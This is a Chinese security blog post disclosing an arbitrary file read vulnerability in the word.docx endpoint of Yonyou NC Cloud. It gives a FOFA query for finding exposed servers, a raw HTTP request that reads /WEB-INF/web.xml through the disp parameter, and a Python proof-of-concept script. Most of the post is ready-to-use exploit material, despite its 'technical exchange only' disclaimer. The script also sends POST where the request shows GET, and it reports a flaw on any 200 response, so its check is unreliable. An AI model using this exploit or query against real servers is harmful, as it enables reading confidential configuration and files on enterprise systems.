用友NC word.docx接口存在任意文件读取漏洞

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、产品介绍

用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。

二、漏洞描述

用友NC Cloud word.docx接口存在任意文件读取漏洞

三、fofa语法

body="UClient.dmg"

四、漏洞复现

poc

html 复制代码
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

五、poc.py

python 复制代码
import requests


def verify(ip):
    url = f'{ip}/portal/docctr/open/word.docx?disp=/WEB-INF/web.xml'

    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept': ' * / *',
        'Connection': 'Keep - Alive'
    }

    try:
        response = requests.post(url, headers=headers)
        print(response)
        # 验证成功输出相关信息
        if response.status_code == 200:
            print(f"{ip}存在用友NC word.docx接口任意文件读取漏洞!!!")
        else:
            print('漏洞不存在')

    except Exception as e:
        pass

if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)
相关推荐
Fnetlink120 分钟前
Fnet 云网安 260717
网络·安全·网络安全
txg6663 小时前
Agent 攻击 Agent:自动检测 LLM Agent 中的污点式漏洞
人工智能·深度学习·安全·网络安全
2501_9151063216 小时前
TraceEagle 代理抓包教程 本机和手机的 HTTPS 抓包方法
网络协议·计算机网络·网络安全·ios·adb·https·udp
Chockmans1 天前
春秋云境CVE-2023-51385(保姆级教学)
大数据·web安全·elasticsearch·搜索引擎·网络安全·春秋云境·cve-2023-51385
ICT系统集成阿祥1 天前
WAF部署方式对比(主流5种:透明桥、反向代理、旁路镜像、串接路由、云WAF)
网络安全·waf·部署模式
清欢渡---1 天前
HCIP-第五章vrrp
网络·网络安全·hcip
m0_738120722 天前
AI安全实战系列(二):Lab01 Foundations和Lab02 Prompt Injection
linux·运维·人工智能·安全·网络安全·系统安全
小小小小钰儿2 天前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程
数据知道2 天前
BGP 劫持是怎么回事?运营商级路由安全科普
网络·安全·网络安全·智能路由器·bgp劫持
m0_738120722 天前
AI安全实战系列(四):Lab04 Multi-Agent——多智能体攻击分析
服务器·开发语言·人工智能·安全·网络安全·语言模型